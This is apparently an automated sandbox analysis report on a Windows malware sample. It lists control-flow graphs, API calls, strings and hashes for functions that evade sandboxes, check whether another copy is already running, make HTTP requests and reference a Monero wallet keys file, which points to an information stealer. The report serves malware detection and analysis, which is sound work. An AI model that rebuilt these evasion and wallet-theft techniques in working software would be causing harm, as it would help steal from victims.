                                        control_flow_graph 1090 925510-925577 call 925ad0 call 92a820 * 3 call 92a740 * 4 1106 92557c-925583 1090->1106 1107 9255d7-92564c call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1106->1107 1108 925585-9255b6 call 92a820 call 92a7a0 call 911590 call 9251f0 1106->1108 1134 925693-9256a9 call 92aad0 StrCmpCA 1107->1134 1138 92564e-92568e call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1107->1138 1124 9255bb-9255d2 call 92a8a0 call 92a800 1108->1124 1124->1134 1139 9256af-9256b6 1134->1139 1140 9257dc-925844 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1134->1140 1138->1134 1142 9257da-92585f call 92aad0 StrCmpCA 1139->1142 1143 9256bc-9256c3 1139->1143 1269 925ac3-925ac6 1140->1269 1162 925991-9259f9 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1142->1162 1163 925865-92586c 1142->1163 1147 9256c5-925719 call 92a820 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1143->1147 1148 92571e-925793 call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1143->1148 1147->1142 1148->1142 1246 925795-9257d5 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1148->1246 1162->1269 1169 925872-925879 1163->1169 1170 92598f-925a14 call 92aad0 StrCmpCA 1163->1170 1177 9258d3-925948 call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1169->1177 1178 92587b-9258ce call 92a820 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1169->1178 1198 925a16-925a21 Sleep 1170->1198 1199 925a28-925a91 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1170->1199 1177->1170 1275 92594a-92598a call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1177->1275 1178->1170 1198->1106 1199->1269 1246->1142 1275->1170
                                        APIs
                                          • Part of subcall function 0092A820: lstrlen.KERNEL32(00914F05,?,?,00914F05,00930DDE), ref: 0092A82B
                                          • Part of subcall function 0092A820: lstrcpy.KERNEL32(00930DDE,00000000), ref: 0092A885
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925644
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009256A1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925857
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925228
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 009252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925318
                                          • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 0092532F
                                          • Part of subcall function 009252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00925364
                                          • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 00925383
                                          • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 009253AE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0092578B
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925940
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925A0C
                                        • Sleep.KERNEL32(0000EA60), ref: 00925A1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: 0Zj$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2987257194
                                        • Opcode ID: 00f499ffa02e44a24d9e6a4ec6efeec0ed71596fbf579aeb29e23f3c906bcf93
                                        • Instruction ID: 68a9b22095710ad11ab00d269c7d971b0b49afc19c9919ba15954a839c274328
                                        • Opcode Fuzzy Hash: 00f499ffa02e44a24d9e6a4ec6efeec0ed71596fbf579aeb29e23f3c906bcf93
                                        • Instruction Fuzzy Hash: 9DE11072910218ABCB14FBA0FC56FED733DAF94300F508568F5066719AEF346A49CB96

                                        Control-flow Graph

                                        control_flow_graph 1301 9217a0-9217cd call 92aad0 StrCmpCA 1304 9217d7-9217f1 call 92aad0 1301->1304 1305 9217cf-9217d1 ExitProcess 1301->1305 1309 9217f4-9217f8 1304->1309 1310 9219c2-9219cd call 92a800 1309->1310 1311 9217fe-921811 1309->1311 1313 921817-92181a 1311->1313 1314 92199e-9219bd 1311->1314 1316 921932-921943 StrCmpCA 1313->1316 1317 921913-921924 StrCmpCA 1313->1317 1318 921970-921981 StrCmpCA 1313->1318 1319 9218f1-921902 StrCmpCA 1313->1319 1320 921951-921962 StrCmpCA 1313->1320 1321 921835-921844 call 92a820 1313->1321 1322 92187f-921890 StrCmpCA 1313->1322 1323 92185d-92186e StrCmpCA 1313->1323 1324 921821-921830 call 92a820 1313->1324 1325 921849-921858 call 92a820 1313->1325 1326 9218cf-9218e0 StrCmpCA 1313->1326 1327 92198f-921999 call 92a820 1313->1327 1328 9218ad-9218be StrCmpCA 1313->1328 1314->1309 1329 921945-921948 1316->1329 1330 92194f 1316->1330 1350 921930 1317->1350 1351 921926-921929 1317->1351 1334 921983-921986 1318->1334 1335 92198d 1318->1335 1348 921904-921907 1319->1348 1349 92190e 1319->1349 1331 921964-921967 1320->1331 1332 92196e 1320->1332 1321->1314 1342 921892-92189c 1322->1342 1343 92189e-9218a1 1322->1343 1340 921870-921873 1323->1340 1341 92187a 1323->1341 1324->1314 1325->1314 1346 9218e2-9218e5 1326->1346 1347 9218ec 1326->1347 1327->1314 1344 9218c0-9218c3 1328->1344 1345 9218ca 1328->1345 1329->1330 1330->1314 1331->1332 1332->1314 1334->1335 1335->1314 1340->1341 1341->1314 1355 9218a8 1342->1355 1343->1355 1344->1345 1345->1314 1346->1347 1347->1314 1348->1349 1349->1314 1350->1314 1351->1350 1355->1314
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 009217C5
                                        • ExitProcess.KERNEL32 ref: 009217D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: 33924f173ccb76c3309297c6b7e3f982e170624052006cf1040796aed9e296ea
                                        • Instruction ID: c6d503b7d631ce535db4e34cf8372c19444a67d6a6290378e010407b86c3539e
                                        • Opcode Fuzzy Hash: 33924f173ccb76c3309297c6b7e3f982e170624052006cf1040796aed9e296ea
                                        • Instruction Fuzzy Hash: D5514CB9A04219EFCB04DFA0E9A4BBE77B9BF94704F104448E416A7344D774E9A1CF62

                                        Control-flow Graph

                                        Control-flow graph (image): basic blocks 927500-92768e. GetWindowsDirectoryA (927500-92754a), then GetVolumeInformationA followed by three calls to sub_928d00 (927553-9275c7); a loop (9275d8-9275fa) calls sub_928d00 once per iteration; GetProcessHeap and RtlAllocateHeap (9275fc-927617) are followed either by wsprintfA plus sub_92a740 (927628-927658) or by sub_92a740 alone (927619-927626), both reaching the return block 92767e-92768e.
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00927542
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0092757F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927603
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092760A
                                        • wsprintfA.USER32 ref: 00927640
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: same 14 dump files as listed for the first function above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: 6fe2d564ee1dbcd4fc1db847c4c9e160e561399d84fede53abece6553c5778a8
                                        • Instruction ID: b02316957ef1892a5b926a535e718bd6fb64d1c87cd350b7bd84443d3ae7b451
                                        • Opcode Fuzzy Hash: 6fe2d564ee1dbcd4fc1db847c4c9e160e561399d84fede53abece6553c5778a8
                                        • Instruction Fuzzy Hash: F34181B1D05358ABDB10DF94EC45BEEBBB8EF48704F100199F50977284DB786A44CBA5

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B2428), ref: 009298A1
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B2230), ref: 009298BA
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B22A8), ref: 009298D2
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B22C0), ref: 009298EA
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B2368), ref: 00929903
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B8F28), ref: 0092991B
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006A59F0), ref: 00929933
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006A5A90), ref: 0092994C
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B2218), ref: 00929964
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B23F8), ref: 0092997C
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B24E8), ref: 00929995
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B2458), ref: 009299AD
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006A5870), ref: 009299C5
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B24D0), ref: 009299DE
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 009111D0: ExitProcess.KERNEL32 ref: 00911211
                                          • Part of subcall function 00911160: GetSystemInfo.KERNEL32(?), ref: 0091116A
                                          • Part of subcall function 00911160: ExitProcess.KERNEL32 ref: 0091117E
                                          • Part of subcall function 00911110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0091112B
                                          • Part of subcall function 00911110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00911132
                                          • Part of subcall function 00911110: ExitProcess.KERNEL32 ref: 00911143
                                          • Part of subcall function 00911220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0091123E
                                          • Part of subcall function 00911220: __aulldiv.LIBCMT ref: 00911258
                                          • Part of subcall function 00911220: __aulldiv.LIBCMT ref: 00911266
                                          • Part of subcall function 00911220: ExitProcess.KERNEL32 ref: 00911294
                                          • Part of subcall function 00926770: GetUserDefaultLangID.KERNEL32 ref: 00926774
                                          • Part of subcall function 00911190: ExitProcess.KERNEL32 ref: 009111C6
                                          • Part of subcall function 00927850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                                          • Part of subcall function 00927850: RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                                          • Part of subcall function 00927850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                                          • Part of subcall function 009278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                                          • Part of subcall function 009278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                                          • Part of subcall function 009278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006B9008,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00926AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00926AF9
                                        • Sleep.KERNEL32(00001770), ref: 00926B04
                                        • CloseHandle.KERNEL32(?,00000000,?,006B9008,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926B1A
                                        • ExitProcess.KERNEL32 ref: 00926B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: same 14 dump files as listed for the first function above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: ed7eb5711966821ab6920f70f72bb8897fa4b50665c648f47918697c4fe74141
                                        • Instruction ID: 4978d9055bc26413ef4afb0b049c42c0a5ea1102fdcecde83084502cdc4e5b7a
                                        • Opcode Fuzzy Hash: ed7eb5711966821ab6920f70f72bb8897fa4b50665c648f47918697c4fe74141
                                        • Instruction Fuzzy Hash: A3312172A04228ABDB04FBF0FC57BEEB778AF94341F104518F212B2199DF745945CAA6

                                        Control-flow Graph

                                        Control-flow graph (image): basic blocks 911220-91129d. The entry block (911220-911247) calls sub_9289b0 and GlobalMemoryStatusEx; one path (911249-911271) calls sub_92da00 twice (the two __aulldiv divisions listed below), the other (911273-91127a) skips them. Both reach a comparison at 911281-911285, after which one outcome (911287 and 911289-911290) leads to ExitProcess (911292-911294) and the other to the return block 91129a-91129d.
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0091123E
                                        • __aulldiv.LIBCMT ref: 00911258
                                        • __aulldiv.LIBCMT ref: 00911266
                                        • ExitProcess.KERNEL32 ref: 00911294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: same 14 dump files as listed for the first function above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: 1bdd3b939e276e66a60d319cec187898b9ce44eb5341fb856b8744c379f54e5f
                                        • Instruction ID: 5432d1320e76f09028c22378c4ff5381f47667cde79dd030ef8d2a3626b243ae
                                        • Opcode Fuzzy Hash: 1bdd3b939e276e66a60d319cec187898b9ce44eb5341fb856b8744c379f54e5f
                                        • Instruction Fuzzy Hash: C6016DB0E4531CBBEF10DBE0DC4ABDEBBB8AB54702F208548E705B62C0DB7455818B99

                                        Control-flow Graph

                                        Control-flow graph (image): basic blocks 926aba-926b22, entered at 926af3 and looping through 926b0a. Each iteration calls sub_92aad0 and OpenEventA (926aba-926ad7); one branch closes the returned handle, calls Sleep and loops back (926af5-926b04); the other calls sub_92aad0 and CreateEventA (926ad9-926af1) and falls through to sub_926920, sub_925b10, CloseHandle and ExitProcess (926b0c-926b22).
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006B9008,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00926AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00926AF9
                                        • Sleep.KERNEL32(00001770), ref: 00926B04
                                        • CloseHandle.KERNEL32(?,00000000,?,006B9008,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926B1A
                                        • ExitProcess.KERNEL32 ref: 00926B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: same 14 dump files as listed for the first function above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 3cdafdda46d7230089c70b830bfddeb1f40feb28c7d3f7d7bf24e2e52b70d131
                                        • Instruction ID: f213d2ce21cdaa48c3a1686af65c2daa6e60e234a3258933bed02b7d26088f6a
                                        • Opcode Fuzzy Hash: 3cdafdda46d7230089c70b830bfddeb1f40feb28c7d3f7d7bf24e2e52b70d131
                                        • Instruction Fuzzy Hash: 1EF05E30944329EBE710ABA0EC16BBD7B34EF54702F104A54B502B25C9CFB05940D656

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: same 14 dump files as listed for the first function above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: 4d94ea8aba3bd5b32aa681d4d72b0f0819292c6d550b81bd10c2d5b70a527d39
                                        • Instruction ID: c096f88b55bec928c044c6a19352ee664351af0adc709922471dbca84c76208d
                                        • Opcode Fuzzy Hash: 4d94ea8aba3bd5b32aa681d4d72b0f0819292c6d550b81bd10c2d5b70a527d39
                                        • Instruction Fuzzy Hash: AA210EB1D00209ABDF14DFA4E845BDE7B75FF45320F108625F915A7291EB706A05CB91

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 00916280: InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                                          • Part of subcall function 00916280: StrCmpCA.SHLWAPI(?,006BEAA8), ref: 00916303
                                          • Part of subcall function 00916280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                                          • Part of subcall function 00916280: HttpOpenRequestA.WININET(00000000,GET,?,006BE230,00000000,00000000,00400100,00000000), ref: 00916385
                                          • Part of subcall function 00916280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                                          • Part of subcall function 00916280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925228
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: same 14 dump files as listed for the first function above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 629209f17229214b3c379e80a77601af8535a9236ee0b4780b5d120796ca2063
                                        • Instruction ID: 2facb571303a0009cefb9ed47e2a051c374560baba731545e8c7635dcc9c16ff
                                        • Opcode Fuzzy Hash: 629209f17229214b3c379e80a77601af8535a9236ee0b4780b5d120796ca2063
                                        • Instruction Fuzzy Hash: A8115231900118ABCB14FF70ED52BED737DAF90300F404558F91A5B1A6EF34AB09CA95
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0091112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00911132
                                        • ExitProcess.KERNEL32 ref: 00911143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 4de000d143ba33628fbc1d2b64d24baf5661c2303e15fb989b9db8129a43d1cf
                                        • Instruction ID: 2337623b8ded51157699efb65a8e31ed59ec45292632909cc8150050a3d08c25
                                        • Opcode Fuzzy Hash: 4de000d143ba33628fbc1d2b64d24baf5661c2303e15fb989b9db8129a43d1cf
                                        • Instruction Fuzzy Hash: DAE0E670A4534CFBE710ABA09C0AB497A78AB04B12F104194F709775D0DAB52A409699
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009110B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009110F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 26169b163b5056946248bfdb311e31f23fcffdf7af01ca092cdb2cee8e0e5d27
                                        • Instruction ID: 9bea2697903472f2613cbef14641007c939b3d9e925afcc9658e8b2384c61c32
                                        • Opcode Fuzzy Hash: 26169b163b5056946248bfdb311e31f23fcffdf7af01ca092cdb2cee8e0e5d27
                                        • Instruction Fuzzy Hash: 19F0E271A41318BBE7149AA4AC59FAFB7ECE709B15F300988F604E3280D9719E40CAA0
                                        APIs
                                          • Part of subcall function 009278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                                          • Part of subcall function 009278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                                          • Part of subcall function 009278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                                          • Part of subcall function 00927850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                                          • Part of subcall function 00927850: RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                                          • Part of subcall function 00927850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                                        • ExitProcess.KERNEL32 ref: 009111C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
